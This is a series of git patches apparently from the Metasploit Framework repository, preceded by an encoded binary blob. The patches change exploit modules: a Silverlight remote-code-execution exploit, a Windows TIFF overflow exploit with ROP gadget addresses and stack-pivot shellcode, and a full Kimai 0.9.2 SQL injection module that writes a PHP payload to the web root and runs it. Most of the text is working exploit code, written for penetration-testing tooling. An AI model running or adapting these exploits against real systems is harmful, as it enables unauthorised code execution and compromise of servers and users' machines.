zh4NnmCKQhCHq`pnZR&UZ>(x7zSAYDKDr?)QvXy4_=ZZV9RlSu$flpzkuLEQckEpxV
z{=lp<pdJalMcpQTHmfHC7u9B!+t{o&x!$TirA!Cjsotu-Gw?pZYk?1`3E27=;FklR
z0OvOYj{*KD@HpV>0!xCAs~s3=&8`mWr6Azj=pn!${SD|9LaC!Vz)b?j1%KX1U4TPU
zK2MhbFVR)N+v!%oEd6`e7ie6`C@$qZ;3k1DsZ3F5o4xnBMRrg9N>aI3`I+*X(hiSx
zbzaS=_p6^%|Czp_+^hbeg`aNJY~nqZ`%3X!AJ(VA-b;CGT#?<^O4`LWXb-JHd#Rw8
zt<>;~9MpPo`7p{j|AYK?fPX)Gj~elXq`sdVC**iCNhml-baV-uPCc4J;rR5t9?Mbw
z7)|4IdNO%fPiAzpx5tU~_mTbZ<a8n(H}1-kW9LozXEb@9(c^SfPZ?(3&~nj^K@(6n
z>2NNUv^`kCVehN6<k)1}Jai%oo)mS&a)wFcxu}_2$c$XTK7GKPU4Q1*lwC<{*N!YE
za!$g@^c*xN_4vqQOwTZ7ZMoHabVAP<W^TkZ4RgX6K7N#@V%DMah!KtJaT-l0a*1dX
zhm0Yd)QvQ1D3hKQ|F|%cj*~Gx&qXq3X0pT&zXlg(<Sx?WI2BTE8ekgLxCY{JlM-3<
zkNtRzE@ab`i7q8!I)5M5A)MI|Wz=Rn4(VwfM?@MOP6#DxE}iS4BgQN=(P4d2Y>L*?
zCXU)tvO04(k&PuuU(6&8b_mCF#GnwOm8V+bgAx^w@njvx9eh+gsZ!y*NX7FWjqABF
zyCH}49HWGoBl^hHe8tG39;1`#R5XqJjW5f(g;bU=X~Fcg)qfny>ghOAPv_XppupjV
z-WX1VIkGyI62;I^ZZSs-G)+;{q$q2;5KWSij33d{`RLjY5j*S-z;TWyaG2F|2Thz{
z?=sBu138@XrV+1#h(2R?2n}SjdTKhkG?B<9^&(@QJgjG9W<t_zbtOi|Ok#Gyj9#xg
zm5HX8R#%Lfn13i@xwRxROC}$zS65A#NM(NBw1$-R9Cmdp?ZAxk8QRE<>*j?-OwSVh
zlE(+m_8wYD#8+#!L%O=+U?Qons<h1xC!(`yBb!UavNWtuFU-zHmzlC?=q5~;@MeXx
z95g65o!){VAwHoeql;3?7S-8;L(XS#4xbzo)L}_4$$z8ebCa_|rX?r!T({8In0An2
zQ#?70MUiNjD@R9?IzP5RlINy)%puAPNY}mlV^dQYy_sZmNuHthkUj10-QPDgm77as
zY400Par>vIrn>CN!BMfyF^I<IFu$=q%iB13Fh4Ab8_YGdV47S8nMYnawzT$)KQV_f
z8|SgZj(<jT&}*4-paa&3DN>GOWwKVFK^+}Bn!aG1*J*ix3Ycw|X-D;JmX|v&qa$MH
zk=!xvD}EM(4o@QvJgFy{%Bz$tj$E+Z6+yc=!V^M1FvqZr$chzr<l9Lz!PhO|CteVW
zYd}8NWKND^IxPxe%wPo`Tw-~vJYbs9CE^i^wSP|*zrAB-;sV4*QyHt{B^JYaE}BSY
z_g~t5u)C|LcVM`^@8IxYd*8rFfBWvPzM=O1k)2&V2L}fa?%dsVnNCHM3;M)TMyDx`
z1xAe+;=E$2JQ?fjrp=pEdT!2$cP;jJ;nTCLy*r=z)(#<?M-L|SWZcRI$HHfMe|-}>
zcYmy5qKCsUmcuNaK|gYSVr-1dd}#M((EyF4FC<JOUC6xrdN^U&{c2|m)?I5O!A!@;
z^K6pROh)%(r<9|ErjZ(qX7&C)TmGOtc$e;2wH@j>s>c)2j?q+<Cl(q^<WkWLW4c`)
zmzN!s-w^3Jo4{tr5{r6L9#R%j>#?b|Xn*naWoaqaW8PYr&RUL*VRquT0;9uLy^UI_
z9-TL=fi$>~NXDtKCgtafgJ=LhX=Oj{remm07<Sh2&>l0g2^mjAN#rf%_hXVYcBgaM
z?sF{FjB)sEN`BH7HwwtgmvNLY9hJ4*WJPwkSPl#BECOT&UuKqQTDC`nhLO~x>3=-U
zTIOwJT-VP#cf+$CX2Bdb*`@sb70+2p6D?u&CnOr(MPcB&+($rRnn@9Ap_8D`Q4}yv
z*arbRIl}VhFN~8&0<{-VZ{nVyS;*u-ACMP@Oo>594tGQN$=ian$Bjh$I+w{>{N1RD
zfis1&A%3MH+iBN2UOzS+C4>}pynnZ0S_hqwQXIbDj#l2mPa|Bo{M%r4A6xDohi>d1
zp(#hlvB{Z-L=5E)8ik#Nco`L+FQO(ww5bhp-NcYBEr8198R5zT!zrq6?Fj5)i@^Zw
zj9cY({FZbH9ENyFJI9vcVO+YjJ#NQ3DXpI+?kU!AiMr@ATGoXqkZY2tc7M>89HV1&
zNHlPyqeM4m;Kw55*~>5}7vxQC5^!4da(fIw(~g-#KYtaaxhQ|TO~1pA;w8ibTy=)T
z?{=Z*(2k5~l{jzZ7==M$?=23t5f^J&@yN+HjkwOd5#Q{%WSj{rZ8m>Stj>we8Q`Xk
zabD(Q7)DOB+<DP7V`uGY$$#6pWIoe5%aYLCLG;$&rkxAmPD%!wj;Qaj^>SatSK41!
z99@zzH?`B+e?00YFeXj_hUt1-N`-Uu+OfQSTt=5J?MO%u@kq`}D@^fbR>}$CD7Kzu
zQsUc^WE#uFBzv<G7acia^<)Pfab&J-cjVW#yOypuiU`k5$7one*ME)3p<idtIck5q
zVQkg68>sS#j9o)A<OJ>p?o>Gqh*iU$_0B^BqEcxJHiy2#QI-b5i}72TL!E_l44J!|
zsA2h>5Fwts<|HP~7?nfPpIap>XY4%Y49bs0W!qZvYmTYiYwLP*d1cF5JOe9iP%V$3
zA&F<sj%e1(>TM%3vwy@ScKJ+LJ~wvAAFXN0lpNxWOIwzj$H9{oE4&IUAKx9&PFt-U
zPKkG&(wEk_<bHAV>b|vO@~cTJ4GXwuuNUuSx_R}mdOa$Bhp8w#BNTJlyr|S!^=pnS
zJJPH@zXIAdb;X*~;%}}v4>+X8LDi9ec1`ngPh<GYx5V;-pMT4Ja?|<`f9v=^-u#{;
z=}hP6fBGKs{k#A9_OCtpAD8aO@}X#9RjDtpwQdd8t=SV+l=5a(Q(anv2UoqS`MhD5
zufgN<xlvc+(#p4h?pL)Sirf64RhGA_Wo2$s6an=BWj+Q$jnp6{z2s7G3&Lv9veOOO
z9k_Pm+Q&8<Jb%#c_j^$5_cM>b!4Gz^=>yXM3c(;(2Sr6t1Yi(AWd)(jTv=bEaRaWr
z%evj?tt`KC6%7iAn^N?J$#U3Yc@WCk0DoOi^$?X``KTuh_=qoz+Q-VTeA4Sx0n5We
zejHAfc?jZVuvg}CF+`aKpVG*MGW%3t=JLWh?gTH~Dt`-IdCp7R@GF1oL0}r{Jzmw<
zP+vkG82OHmFaGh8;?hD9KNvv>UHLJvHpDSd15kr*a4R)6s_KTVZDR0$d&$iP%d|p^
zDwGO-Y1-hioUDg0@XqTBLcdq>Nt^EpS+`Pmm>M|3Wj^t|zFvGo!zgr5ZKJomyrldd
zfB8L?4SzmgnPh-3h!27gY~Y@*36yxXps#$rue=6CbhaN%ZnVq?i+-Qa@Ade7ezfj!
z?xq0ph||D_5Z0>=9tnZRNAP4@=$>{C?>*fTE!@$i<pX8l4B%4Byx#JAcAyQctD$~S
zp&G~cE!y(m!Mm`dqf4QQvJHjvg#CPhj}oQMZ+~d?ty3uAc>0Wf;Ahok3i*%bzeGe7
zR;aG<@G1QCBjG|_xTmWdQri^T+%vsvSO2aZJKOb{-rene@tN-S-MhMXw0G~0cJ1iu
z@9pW^*-uoWkhk0ViXf3svA@lSg7v%7Mt;dXp;qxXTX0-2JRX>s<EPU3C;9o`)w1wi
z{C}OlGq|uxKQTT$-trfTpTGTl`q0B_cl~=u&L#O-{m`DXeDKeny?G&;4xfr%ymLXn
zcy?INp3fPXv#IP%d$t&pv&C>Yi^lZ)*%La>GFjb0?#RTaiT?1m;`@b1^S|j`<MWXM
z-_(#{4kwfRXy1B1uj}$MfIqKqq3{9vw|~!X>!Zkbb!x0%5HF*1K6R}@&;NFK@*Gmr
z@%w3?i+^o$3Tx05;0RW*ah%1DV<$I-`!PBw-|iv$OZO|US$dRZI&X6Pu6xDLqG?#T
zPGJo*p(i1`U_R&Z4xK-nMQTF!=e(ClI?k!q=hN;v{?d_s&b0O_t2GS^Pgmiu4}U8+
zVt_lpUmLP_mTY4QEsDxcf<H%P2Vu$%+K_dhe|yc}JIUJ^mX)`7W-a=*)-IML_CAOF
zDXGso<hrqk=qg-nZymo~w|8m0r{cXy(aW{$bjXRq8d+zl4)VM!nH5QHZ3gW$3+G^3
zgBGSoaIJ2Cn0nw<x80V*;@fdsE>dCpmTz17SN3t2#B@w7#j%Is6Th<`t{2NbiRE&+
zl@VPT&s`!jAp0fWGfvCdF8ro)|IdHMtnbl%Vb8zKe*Zsy{tr+~0RjL36aWAS2mm&l
clRF?h33R=7L!WH%lnRr8AU6gqAOHXW0NuwasQ>@~

diff --git a/external/source/exploits/cve-2013-0074/SilverApp1/MainPage.xaml b/external/source/exploits/cve-2013-0074/SilverApp1/MainPage.xaml
index 09ba4ecbdb..008eababf2 100755
--- a/external/source/exploits/cve-2013-0074/SilverApp1/MainPage.xaml
+++ b/external/source/exploits/cve-2013-0074/SilverApp1/MainPage.xaml
@@ -7,7 +7,7 @@
     d:DesignHeight="400" d:DesignWidth="600" xmlns:sdk="http://schemas.microsoft.com/winfx/2006/xaml/presentation/sdk" Width="Auto" Height="Auto">
 
     <Grid x:Name="LayoutRoot" Background="White" Height="400" Width="600">
-        <Button Content="Run calc.exe" Height="23" HorizontalAlignment="Right" Margin="0,367,241,0" Name="btnClickMe" VerticalAlignment="Top" Width="119" Click="btnClickMe_Click" />
+        <Button Content="Run..." Height="23" HorizontalAlignment="Right" Margin="0,367,241,0" Name="btnClickMe" VerticalAlignment="Top" Width="119" Click="btnClickMe_Click" />
         <RichTextBox HorizontalAlignment="Left" Margin="12,32,0,0" Name="richTxtBox" VerticalAlignment="Top" Height="330" Width="576" TextWrapping="NoWrap" HorizontalScrollBarVisibility="Auto" />
         <TextBlock Height="23" HorizontalAlignment="Right" Margin="0,4,12,0" Name="textBlock1" Text="Silverlight Application" VerticalAlignment="Top" Width="576" Foreground="Navy" FontSize="14" TextAlignment="Center" />
     </Grid>

From 7e4487b93b062193789133ef680bb4f1be7deb23 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 22 Nov 2013 17:37:23 -0600
Subject: [PATCH 072/217] Update description

---
 .../windows/browser/ms13_022_silverlight_script_object.rb       | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
index 5b8e8cba45..ca6306e47b 100644
--- a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
+++ b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
@@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
         unsafe manner. Since it is accessible for untrusted code (user controlled) it's possible
         to dereference arbitrary memory which easily leverages to arbitrary code execution. In order
         to bypass DEP/ASLR a second vulnerability is used, in the public WriteableBitmap class
-        from System.Windows.dll. This module has been tested successfully on IE6 - IE8, Windows XP
+        from System.Windows.dll. This module has been tested successfully on IE6 - IE10, Windows XP
         SP3 / Windows 7 SP1 on both x32 and x64 architectures.
       },
       'License'        => MSF_LICENSE,

From 9f539bafaeef8e0a8d3639710a5e773cf638305d Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 22 Nov 2013 17:56:05 -0600
Subject: [PATCH 073/217] Add README on the source code dir

---
 external/source/exploits/cve-2013-0074/README | 14 ++++++++++++++
 1 file changed, 14 insertions(+)
 create mode 100644 external/source/exploits/cve-2013-0074/README

diff --git a/external/source/exploits/cve-2013-0074/README b/external/source/exploits/cve-2013-0074/README
new file mode 100644
index 0000000000..daeec3271c
--- /dev/null
+++ b/external/source/exploits/cve-2013-0074/README
@@ -0,0 +1,14 @@
+Original Exploit by Vitaliy Toropov
+
+See Packet Storm Advisory 2013-1022-1
+http://packetstormsecurity.com/files/123732/PSA-2013-1022-1.txt
+
+Source code just modified to add a new Silverlight 5 target and tweak it to allow dynamic payloads, not
+just the hardcoded one.
+
+In order to put an environment ready:
+
+- Install Visual Studio 2010
+- Install Visual Studio 2010 SP1
+- Install Silverlight 5 tools for Visual Studio 2010. (http://www.microsoft.com/en-us/download/details.aspx?id=28358)
+- Install the Silverlight5 Developer version (SDK) needed for testing.
\ No newline at end of file

From eddedd4746d3417b0dafd868ca8541bc48dafe15 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Fri, 22 Nov 2013 19:14:56 -0600
Subject: [PATCH 074/217] Working version

---
 .../windows/fileformat/mswin_tiff_overflow.rb | 21 +++++++++++++------
 1 file changed, 15 insertions(+), 6 deletions(-)

diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
index fe317c739f..9767a3b198 100644
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -69,11 +69,14 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'Payload'        =>
         {
-          'BadChars' => "\x00"
+          'PrependEncoder' => "\x81\xc4\x80\xc7\xfe\xff",   # add esp, -80000; popad; popfd
+          'StackAdjustment' => -3500,
+          'BadChars'        => "\x00"
         },
       'DefaultOptions'  =>
         {
-          'ExitFunction' => "process"
+          'ExitFunction' => "process",
+          'PrependMigrate' => true
         },
       'Platform'       => 'win',
       'Targets'        =>
@@ -134,7 +137,8 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     # Gain control of the call [eax+50h] instruction
-    buf[0x4874, 4] = [0x41424344-0x50].pack('V')
+    # XCHG EAX, ESP; RETN msvcrt
+    buf[0x4874, 4] = [0x200F0700-0x50].pack('V')
 
     buf
   end
@@ -147,8 +151,10 @@ class Metasploit3 < Msf::Exploit::Remote
     # Target address (200F0700):
     # 0:000> dd  200f06fc L4
     # 200f06fc  ffffffff 36643ab8 d9c0d946 5af42474
-    p      = generate_rop_payload('msvcrt','',{'target'=>'xp'})
-    p     << payload.encoded
+    p = ''
+    p << [0x77c15ed5].pack('V') # XCHG EAX, ESP  msvcrt
+    p << generate_rop_payload('msvcrt','',{'target'=>'xp'})
+    p << payload.encoded
     block  = p
     block << "B" * (1024 - p.length)
 
@@ -227,7 +233,10 @@ class Metasploit3 < Msf::Exploit::Remote
     mscd << [0x00000002].pack('V')
     mscd << [0x00000003].pack('V')
     mscd << [0xfffffffe].pack('V')
-    mscd << [0xffffffff].pack('V') * 52
+    mscd << [0xffffffff].pack('V') * 32 #52
+    mscd << [0x77c34fbf].pack('V') # POP ESP # RETN
+    mscd << [0x200f0704].pack('V') # Final payload target address to begin the ROP
+    mscd << [0xffffffff].pack('V') * 18
     mscd << @rop_payload
 
     mscd

From f871452b9796635b55ba7269556ec4b0ba5b63ee Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Fri, 22 Nov 2013 19:27:00 -0600
Subject: [PATCH 075/217] Slightly change the description

Because it isn't that slow
---
 modules/exploits/windows/fileformat/mswin_tiff_overflow.rb | 3 ---
 1 file changed, 3 deletions(-)

diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
index 9767a3b198..ca41ecdbae 100644
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -51,9 +51,6 @@ class Metasploit3 < Msf::Exploit::Remote
           in OGL!GdipCreatePath. By successfully controlling this function pointer, and the
           memory layout using ActiveX, it is possible to gain arbitrary code execution under the
           context of the user.
-
-          Please note the victim machine may experience some lag while opening the file before
-          the malicious payload is executed.
         },
       'License'        => MSF_LICENSE,
       'Author'         =>

From 8fc0a8199ef31247074bd6685901be4144ed3686 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <todb@packetfu.com>
Date: Fri, 22 Nov 2013 22:12:48 -0600
Subject: [PATCH 076/217] DB_ALL_CREDS should be disabled by default

[SeeRM #8699]
---
 lib/msf/core/auxiliary/auth_brute.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/auxiliary/auth_brute.rb b/lib/msf/core/auxiliary/auth_brute.rb
index 6de6500bf7..2570106243 100644
--- a/lib/msf/core/auxiliary/auth_brute.rb
+++ b/lib/msf/core/auxiliary/auth_brute.rb
@@ -22,7 +22,7 @@ module Auxiliary::AuthBrute
       OptBool.new('VERBOSE', [ true, "Whether to print output for all attempts", true]),
       OptBool.new('BLANK_PASSWORDS', [ false, "Try blank passwords for all users", true]),
       OptBool.new('USER_AS_PASS', [ false, "Try the username as the password for all users", true]),
-      OptBool.new('DB_ALL_CREDS', [false,"Try each user/password couple stored in the current database",true]),
+      OptBool.new('DB_ALL_CREDS', [false,"Try each user/password couple stored in the current database",false]),
       OptBool.new('DB_ALL_USERS', [false,"Add all users in the current database to the list",false]),
       OptBool.new('DB_ALL_PASS', [false,"Add all passwords in the current database to the list",false]),
       OptBool.new('STOP_ON_SUCCESS', [ true, "Stop guessing when a credential works for a host", false]),

From d748fd4003a0658cb823d2b4d7cac044f77f6044 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Fri, 22 Nov 2013 23:35:26 -0600
Subject: [PATCH 077/217] Final commit

---
 .../windows/fileformat/mswin_tiff_overflow.rb       | 13 +++++++------
 1 file changed, 7 insertions(+), 6 deletions(-)

diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
index ca41ecdbae..59cb9f7b5c 100644
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -12,7 +12,7 @@ module XML
   class Builder
     #
     # Some XML documents don't declare the namespace before referencing, but Nokogiri requires one.
-    # So here's our hack to get around that.
+    # So here's our hack to get around that by adding a new custom method to the Builder class
     #
     def custom_root(ns)
       e = @parent.create_element(ns)
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'Unknown', # Some dude wrote it and deployed in the wild
+          'Unknown', # Some dude wrote it and deployed in the wild, but Haifei Li spotted it
           'sinn3r'   # Metasploit
         ],
       'References'     =>
@@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'Payload'        =>
         {
-          'PrependEncoder' => "\x81\xc4\x80\xc7\xfe\xff",   # add esp, -80000; popad; popfd
+          'PrependEncoder' => "\x81\xc4\x80\xc7\xfe\xff", # add esp, -80000
           'StackAdjustment' => -3500,
           'BadChars'        => "\x00"
         },
@@ -78,10 +78,11 @@ class Metasploit3 < Msf::Exploit::Remote
       'Platform'       => 'win',
       'Targets'        =>
         [
-          ['Windows XP SP3 with Office 2010', {}],
+          # XP SP3 + Office 2010 Standard (14.0.6023.1000 32-bit)
+          ['Windows XP SP3 with Office Starndard 2010', {}],
         ],
       'Privileged'     => false,
-      'DisclosureDate' => "Nov 8 2013",
+      'DisclosureDate' => "Nov 5 2013", # Microsoft announcement
       'DefaultTarget'  => 0))
 
       register_options(
@@ -153,7 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote
     p << generate_rop_payload('msvcrt','',{'target'=>'xp'})
     p << payload.encoded
     block  = p
-    block << "B" * (1024 - p.length)
+    block << rand_text_alpha(1024 - p.length)
 
     buf = ''
     while (buf.length < 0x80000)

From 6ccc3e3c4868e3245e1d5e676e88dadc1b254243 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Sat, 23 Nov 2013 00:47:45 -0600
Subject: [PATCH 078/217] Make payload execution more stable

---
 modules/exploits/windows/fileformat/mswin_tiff_overflow.rb | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
index 59cb9f7b5c..e95621d2a5 100644
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -66,8 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'Payload'        =>
         {
-          'PrependEncoder' => "\x81\xc4\x80\xc7\xfe\xff", # add esp, -80000
-          'StackAdjustment' => -3500,
+          #'PrependEncoder' => "\xbc\x36\x06\x0f\x20",      # mov esp, 200f0636h
+          'PrependEncoder' => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
+                              "\x83\xC0\x08"             + # add eax, byte 8
+                              "\x8b\x20"                 + # mov esp, [eax]
+                              "\x81\xC4\x30\xF8\xFF\xFF",  # add esp, -2000
           'BadChars'        => "\x00"
         },
       'DefaultOptions'  =>

From 9987ec0883524de61df0a82ee206420222aef8d3 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Sat, 23 Nov 2013 00:51:58 -0600
Subject: [PATCH 079/217] Hmm, change ranking

---
 modules/exploits/windows/fileformat/mswin_tiff_overflow.rb | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
index e95621d2a5..9290d0b3b8 100644
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -26,7 +26,7 @@ end
 
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = NormalRanking
+  Rank = AverageRanking
 
   include Msf::Exploit::FILEFORMAT
   include Msf::Exploit::RopDb
@@ -66,12 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'Payload'        =>
         {
-          #'PrependEncoder' => "\xbc\x36\x06\x0f\x20",      # mov esp, 200f0636h
           'PrependEncoder' => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
                               "\x83\xC0\x08"             + # add eax, byte 8
                               "\x8b\x20"                 + # mov esp, [eax]
                               "\x81\xC4\x30\xF8\xFF\xFF",  # add esp, -2000
-          'BadChars'        => "\x00"
+          'BadChars'       => "\x00"
         },
       'DefaultOptions'  =>
         {

From d8700314e75d59171f4c6d26af780075fce4d852 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 24 Nov 2013 02:32:16 +1030
Subject: [PATCH 080/217] Add Kimai v0.9.2 'db_restore.php' SQL Injection
 module

---
 modules/exploits/unix/webapp/kimai_sqli.rb | 173 +++++++++++++++++++++
 1 file changed, 173 insertions(+)
 create mode 100644 modules/exploits/unix/webapp/kimai_sqli.rb

diff --git a/modules/exploits/unix/webapp/kimai_sqli.rb b/modules/exploits/unix/webapp/kimai_sqli.rb
new file mode 100644
index 0000000000..91035980fb
--- /dev/null
+++ b/modules/exploits/unix/webapp/kimai_sqli.rb
@@ -0,0 +1,173 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = AverageRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Kimai v0.9.2 'db_restore.php' SQL Injection",
+      'Description'    => %q{
+          This module exploits a SQL injection vulnerability in Kimai version
+        0.9.2.x. The 'db_restore.php' file allows unauthenticated users to
+        execute arbitrary SQL queries. This module writes a PHP payload to
+        disk if the following conditions are met: The PHP configuration must
+        have 'display_errors' enabled, Kimai must be configured to use a
+        MySQL database running on localhost; and the MySQL user must have
+        write permission to the Kimai 'temporary' directory.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'drone (@dronesec)', # Discovery and PoC
+          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+        ],
+      'References'     =>
+        [
+          ['EDB'       => '25606'],
+          ['OSVDB'     => '93547'],
+        ],
+      'Payload'        =>
+        {
+          'Space'      => 8000, # HTTP POST
+          'DisableNops'=> true,
+          'BadChars'   => "\x00\x0a\x0d\x27"
+        },
+      'Arch'           => ARCH_PHP,
+      'Platform'       => 'php',
+      'Targets'        =>
+        [
+          # Tested on Kimai versions 0.9.2.beta, 0.9.2.1294.beta, 0.9.2.1306-3
+          [ 'Kimai version 0.9.2.x (PHP Payload)', { 'auto' => true } ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'May 21 2013',
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('TARGETURI',  [true,  'The base path to Kimai', '/kimai/']),
+          OptString.new('TARGETPATH', [false, 'The path to the web server document root directory', '/var/www/'])
+        ], self.class)
+  end
+
+  #
+  # Checks if target is Kimai version 0.9.2.x
+  #
+  def check
+    print_status("#{peer} - Checking version...")
+    res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, "index.php") })
+    if not res
+      print_error("#{peer} - Request timed out")
+      return Exploit::CheckCode::Unknown
+    elsif res.body =~ /Kimai/ and res.body =~ /(0\.9\.[\d\.]+)<\/strong>/
+      version = "#{$1}"
+      print_good("#{peer} - Found version: #{version}")
+      if version >= "0.9.2" and version <= "0.9.2.1306"
+        return Exploit::CheckCode::Detected
+      else
+        return Exploit::CheckCode::Safe
+      end
+    end
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+
+    # Get file system path
+    print_status("#{peer} - Retrieving file system path...")
+    res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, 'includes/vars.php') })
+    if not res
+      fail_with(Failure::Unknown, "#{peer} - Request timed out")
+    elsif res.body =~ /Undefined variable: .+ in (.+)includes\/vars\.php on line \d+/
+      path = "#{$1}"
+      print_good("#{peer} - Found file system path: #{path}")
+    else
+      path = normalize_uri(datastore['TARGETPATH'], target_uri.path)
+      print_warning("#{peer} - Could not retrieve file system path. Assuming '#{path}'")
+    end
+
+    # Get MySQL table name prefix from temporary/logfile.txt
+    print_status("#{peer} - Retrieving MySQL table name prefix...")
+    res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, 'temporary', 'logfile.txt') })
+    if not res
+      fail_with(Failure::Unknown, "#{peer} - Request timed out")
+    elsif prefixes = res.body.scan(/CREATE TABLE `(.+)usr`/)
+      table_prefix = "#{prefixes.flatten.last}"
+      print_good("#{peer} - Found table name prefix: #{table_prefix}")
+    else
+      table_prefix = 'kimai_'
+      print_warning("#{peer} - Could not retrieve MySQL table name prefix. Assuming '#{table_prefix}'")
+    end
+
+    # Create a backup ID
+    print_status("#{peer} - Creating a backup to get a valid backup ID...")
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, 'db_restore.php'),
+      'vars_post' => {
+        'submit'  => 'create backup'
+      }
+    })
+    if not res
+      fail_with(Failure::Unknown, "#{peer} - Request timed out")
+    elsif backup_ids = res.body.scan(/name="dates\[\]" value="(\d+)">/)
+      id = "#{backup_ids.flatten.last}"
+      print_good("#{peer} - Found backup ID: #{id}")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Could not retrieve backup ID")
+    end
+
+    # Write PHP payload to disk using MySQL injection 'into outfile'
+    fname = "#{rand_text_alphanumeric(rand(10)+10)}.php"
+    sqli  = "#{id}_#{table_prefix}var UNION SELECT '<?php #{payload.encoded} ?>' INTO OUTFILE '#{path}/temporary/#{fname}';-- "
+    print_status("#{peer} - Writing payload (#{payload.encoded.length} bytes) to '#{path}/temporary/#{fname}'...")
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, 'db_restore.php'),
+      'vars_post' => Hash[{
+        'submit'  => 'recover',
+        'dates[]' => sqli
+      }.to_a.shuffle]
+    })
+    if not res
+      fail_with(Failure::Unknown, "#{peer} - Request timed out")
+    elsif res.code == 200
+      print_good("#{peer} - Payload sent successfully")
+      register_files_for_cleanup(fname)
+    else
+      print_error("#{peer} - Sending payload failed. Received HTTP code: #{res.code}")
+    end
+
+    # Remove the backup
+    print_status("#{peer} - Removing the backup...")
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, 'db_restore.php'),
+      'vars_post' => Hash[{
+        'submit'  => 'delete',
+        'dates[]' => "#{id}"
+      }.to_a.shuffle]
+    })
+    if not res
+      print_warning("#{peer} - Request timed out")
+    elsif res.code == 302 and res.body !~ /#{id}/
+      vprint_good("#{peer} - Deleted backup with ID '#{id}'")
+    else
+      print_warning("#{peer} - Could not remove backup with ID '#{id}'")
+    end
+
+    # Execute payload
+    print_status("#{peer} - Retrieving file '#{fname}'...")
+    res = send_request_raw({
+      'uri' => normalize_uri(target_uri.path, 'temporary', "#{fname}")
+    }, 5)
+  end
+end

From 31b4e72196405d61ee939082be2bd5176c20e2f3 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Sat, 23 Nov 2013 23:06:52 -0600
Subject: [PATCH 081/217] Switch to soft tabs the cs code

---
 .../cve-2013-0074/SilverApp1/App.xaml.cs      |  80 +--
 .../cve-2013-0074/SilverApp1/MainPage.xaml.cs | 528 +++++++++---------
 2 files changed, 304 insertions(+), 304 deletions(-)

